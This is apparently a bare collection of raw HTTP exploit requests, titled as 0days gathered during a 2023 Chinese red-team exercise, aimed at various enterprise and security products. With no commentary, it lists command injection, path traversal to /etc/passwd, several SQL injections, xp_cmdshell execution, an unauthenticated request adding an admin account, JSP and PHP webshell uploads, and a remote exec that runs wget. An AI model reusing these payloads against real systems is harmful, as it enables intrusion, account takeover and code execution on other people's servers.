2023HW期间0day

POST /rep/login HTTP/1.1 Host: URLCookie: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2 Accept-Encoding: gzip deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers Connection: close Content-Type:application/x-www-form-urlencoded Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 Host:  Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3 Content-Length: 1117 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close  <?xml version="1.0"?>   <methodCall> <methodName>web.user_add</methodName> <params> <param> <value> <array> <data> <value> <string>admin</string> </value> <value> <string>5</string> </value> <value> <string>10.0.0.1</string> </value> </data> </array> </value> </param> <param> <value> <struct> <member> <name>uname</name> <value> <string>test</string> </value> </member> <member> <name>name</name> <value> <string>test</string> </value> </member> <member> <name>pwd</name> <value> <string>1qaz@3edC12345</string> </value> </member> <member> <name>authmode</name> <value> <string>1</string> </value> </member> <member> <name>deptid</name> <value> <string></string> </value> </member> <member> <name>email</name> <value> <string></string> </value> </member> <member> <name>mobile</name> <value> <string></string> </value> </member> <member> <name>comment</name> <value> <string></string> </value> </member> <member> <name>roleid</name> <value> <string>102</string> </value> </member> </struct></value> </param> </params> </methodCall>

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0

POST /C6/Control/GetSqlData.aspx/.ashxHost: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflate

POST /publishing/publishing/material/file/video HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close
--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="poc"
poc--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"
submit--dd8f988919484abab3816881c55272a7--

POST /servlet/PayBill?caculate&_rnd= HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>

exec master..xp_cmdshell 'whoami';

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

POST /?g=obj_app_upfile HTTP/1.1 Host: x.x.x.x Accept: */* Accept-Encoding: gzip, deflate Content-Length: 574 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)  ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="MAX_FILE_SIZE"  10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="upfile"; filename="vulntest.php" Content-Type: text/plain  <?php php马?>  ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="submit_post"  obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="__hash__"  0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc--

POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='